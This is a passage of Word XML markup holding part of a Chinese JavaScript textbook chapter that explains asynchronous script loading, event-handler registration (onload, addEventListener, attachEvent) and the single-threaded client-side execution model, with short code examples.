        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>13-4</w:t>
      </w:r>
      <w:r>
        <w:t>：异步载入并执行脚本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>异步载入并执行一个指定</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>中的脚本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function loadasync(url){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var head=document.getElementsByTagName("head")[0];//</w:t>
      </w:r>
      <w:r>
        <w:t>找到＜</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s=document.createElement("script");//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.src=url;//</w:t>
      </w:r>
      <w:r>
        <w:t>设置其</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>head.appendChild(s);//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>元素插入</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>标签中</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注意这</w:t>
      </w:r>
      <w:r>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:t>loadasync()</w:t>
      </w:r>
      <w:r>
        <w:t>函数会动态地载入脚本</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>脚本载入到文档中，成为正在执行的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序的一部分，既不是通过</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面内联包含，也不是来自</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面的静态引用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="314" w:name="13_3_2_Shi_Jian_Qu_Dong_De_JavaScript"/>
      <w:r>
        <w:t>13.3.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　事件驱动的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="314"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>13-3</w:t>
      </w:r>
      <w:r>
        <w:t>里展示的古老的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序是同步载入的程序：在页面载入时开始执行，生成一些输出，然后结束。这种类型的程序在今天已经不常见了。反之，我们通过注册事件处理程序函数来写程序。之后在注册的事件发生时异步调用这些函数。例如，想要为常用操作启用键盘快捷键的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用会为键盘事件注册事件处理程序。甚至非交互的程序也使用事件。假如想要写一个分析文档结构并自动生成文档内容的表格的程序。程序不需要用户输入事件的事件处理程序，但它还是会注册</w:t>
      </w:r>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序，这样就可以知道文档在什么时候载入完成并可以</w:t>
      </w:r>
      <w:r>
        <w:t>生成内容表格了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>事件和事件处理是第</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章的主题，但是这一节会提供一个快速概览。事件都有名字，比如</w:t>
      </w:r>
      <w:r>
        <w:t>click</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>change</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>mouseover</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>keypress</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>readystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>，指示发生的事件的通用类型。事件还有目标，它是一个对象，并且事件就是在它上面发生的。当我们谈论事件的时候，必须同时指定事件类型（名字）和目标：比如，一个单击事件发生在</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLButtonElement</w:t>
      </w:r>
      <w:r>
        <w:t>对象上，或者一个</w:t>
      </w:r>
      <w:r>
        <w:t>readystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>事件发生在</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果想要程序</w:t>
      </w:r>
      <w:r>
        <w:t>响应一个事件，写一个函数，叫做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>事件监听器</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>回调</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。然后注册这个函数，这样他就会在事件发生时调用它。正如前面提到的，这可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性来完成，但是我们不鼓励将</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码和</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>内容混淆在一起。反之，注册事件处理程序最简单的方法是把</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数赋值给目标对象的属性，类似这样的代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.onload=function(){...};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.getElementById("button1").onclick=function(){..</w:t>
      </w:r>
      <w:r>
        <w:t>.};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function handleResponse(){...}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.onreadystatechange=handleResponse;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，按照约定，事件处理程序的属性的名字是以</w:t>
      </w:r>
      <w:r>
        <w:t>"on"</w:t>
      </w:r>
      <w:r>
        <w:t>开始，后面跟着事件的名字。还要注意在上面的任何代码里没有函数调用：</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>只是把函数本身赋值给这些属性。浏览器会在事件发生时执行调用。用事件进行异步编程会经常涉及嵌套函数，也经常要在函数的函数里定义函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对于大部分浏览器中的大部分事件来说，会把一个对象传递给事件处理程序作为参数，那个对象的属性提供了事件的详</w:t>
      </w:r>
      <w:r>
        <w:t>细信息。比如，传递给单击事件的对象，会有一个属性说明鼠标的哪个按钮被单击。（在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>里，这些事件信息被存储在全局</w:t>
      </w:r>
      <w:r>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:t>对象里，而不是传递给处理程序函数。）事件处理程序的返回值有时用来指示函数是否充分处理了事件，以及阻止浏览器执行它默认会进行的各种操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有些事件的目标是文档元素，它们会经常往上传递给文档树，这个过程叫做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>冒泡</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。例如，如果用户在＜</w:t>
      </w:r>
      <w:r>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素上单击鼠标，单击事件就会在按钮上触发。如果注册在按钮上的函数没有处理（并且冒泡停止）该事件，事件会冒泡到按钮嵌套的容器元素，这样，任何注册在容器</w:t>
      </w:r>
      <w:r>
        <w:t>元素上的单击事件都会调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果需要为一个事件注册多个事件处理程序函数，或者如果想要写一个可以安全注册事件处理程序的代码模块，就算另一个模块已经为相同的目标上的相同的事件注册了一个处理程序，也需要用</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>到另一种事件处理程序注册技术。大部分可以成为事件目标的对象都有一个叫做</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListaner()</w:t>
      </w:r>
      <w:r>
        <w:t>的方法，允许注册多个监听器：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.addEventListener("load",function(){...},false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.addEventListener("readyst</w:t>
      </w:r>
      <w:r>
        <w:t>atechange",function(){...},false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意这个函数的第一个参数是事件的名称。虽然</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>已经标准化超过了十年，而微软目前只有在</w:t>
      </w:r>
      <w:r>
        <w:t>IE9</w:t>
      </w:r>
      <w:r>
        <w:t>里实现了它。在</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>以及之前的浏览器中，必须使用一个相似的方法，叫做</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.attachEvent("onload",function(){...});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参见第</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章查看更多关于</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序还使用异步通知类型，这些类型往往不是事件。如果设置</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:r>
        <w:t>属性为一个函数，会在发生（参阅章</w:t>
      </w:r>
      <w:r>
        <w:t>14.6</w:t>
      </w:r>
      <w:r>
        <w:t>节）</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>错误（或其他未捕获的异常）时调用函数。还有，</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>函数（这些是</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的方法，因此是客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的全局函数）会在指定的</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>一段时间之后触发指定函数的调用。传递给</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>的函数和真实事件处理程序的注册不同，它们通常叫做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>回调逻辑</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>而不是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，但它们和事件处理程序一样，也是异步</w:t>
      </w:r>
      <w:r>
        <w:t>的。参见</w:t>
      </w:r>
      <w:r>
        <w:t>14.1</w:t>
      </w:r>
      <w:r>
        <w:t>节获得更多关于</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>13-5</w:t>
      </w:r>
      <w:r>
        <w:t>演示了</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>，定义一个</w:t>
      </w:r>
      <w:r>
        <w:t>onload()</w:t>
      </w:r>
      <w:r>
        <w:t>函数注册在文档载入完成时执行的函数。</w:t>
      </w:r>
      <w:r>
        <w:t>on load()</w:t>
      </w:r>
      <w:r>
        <w:t>是非常有用的函数，我们会在本书后面的例子中用到它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>13-5</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>onLoad()</w:t>
      </w:r>
      <w:r>
        <w:t>，当文档载入完成时调用一个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注册函数</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>，当文档载入完成时执行这个函数</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果文档已经载入完成，尽快以异步方式执行它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function onL</w:t>
      </w:r>
      <w:r>
        <w:t>oad(f){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(onLoad.loaded)//</w:t>
      </w:r>
      <w:r>
        <w:t>如果文档已经载入完成</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.setTimeout(f,0);//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>放入异步队列，并尽快执行它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(window.addEventListener)//</w:t>
      </w:r>
      <w:r>
        <w:t>注册事件的标准方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.addEventListener("load",f,false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(window.attachEvent)//IE8</w:t>
      </w:r>
      <w:r>
        <w:t>以及更早的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>版本浏览器注册事件的方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.attachEvent("onload",f);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>onLoad</w:t>
      </w:r>
      <w:r>
        <w:t>设置一个标志，用来指示文档是否载入完成</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>onLoad.loaded=false;//</w:t>
      </w:r>
      <w:r>
        <w:t>注册一个函数，当文档载入完成时设置这个标志</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>onLoad(function(){onLoad.loaded=true;});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="315" w:name="13_3_3_Ke_Hu_Duan_JavaScriptXian_Cheng_M"/>
      <w:r>
        <w:t>13.3.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>线程模型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="315"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心并不包含任何线程机制，并且客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>传统上也没有定义任何线程机制。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一种作为后台线程的</w:t>
      </w:r>
      <w:r>
        <w:t>"WebWorker"</w:t>
      </w:r>
      <w:r>
        <w:t>，但是客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>还像严格的单线程一样工作。甚至当可能并发执行的时候，客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>也不会知晓是否真的有并行逻辑的执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>单线程执行是为了让编程更加简单。编写代码时可以确保两个事件处理程序不会同一时刻运行，操作文档内容时也不必担心会有其他线程试图同时修改文档，并且永远不需要在写</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码的时候担心锁、死锁</w:t>
      </w:r>
      <w:r>
        <w:t>和竞态条件（</w:t>
      </w:r>
      <w:r>
        <w:t>race condition</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>单线程执行意味着浏览器必须在脚本和事件句处理程序执行的时候停止响应用户输入。这为</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序员带来了负担，它意味着</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>脚本和事件处理程序不能运行太长时间。如果一个脚本执行计算密集的任务，它将会给文档载入带来延迟，而用户无法在脚本完成前看到文档内容。如果事件处理程序执行计算密集的任务，浏览器可能变得无法响应，可能会导致用户认为浏览器崩溃了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果应用程序不得不执行太多的计算而导致明显的延迟，应该允许文档在执行这个计算之前完全载入，</w:t>
      </w:r>
      <w:r>
        <w:t>并确保能够告知用户计算正在进行并且浏览器没有挂起。如果可能将计算分解为离散的子任</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>务，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>方法在后台运行子任务，同时更新一个进度指示器向用户显示反馈。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
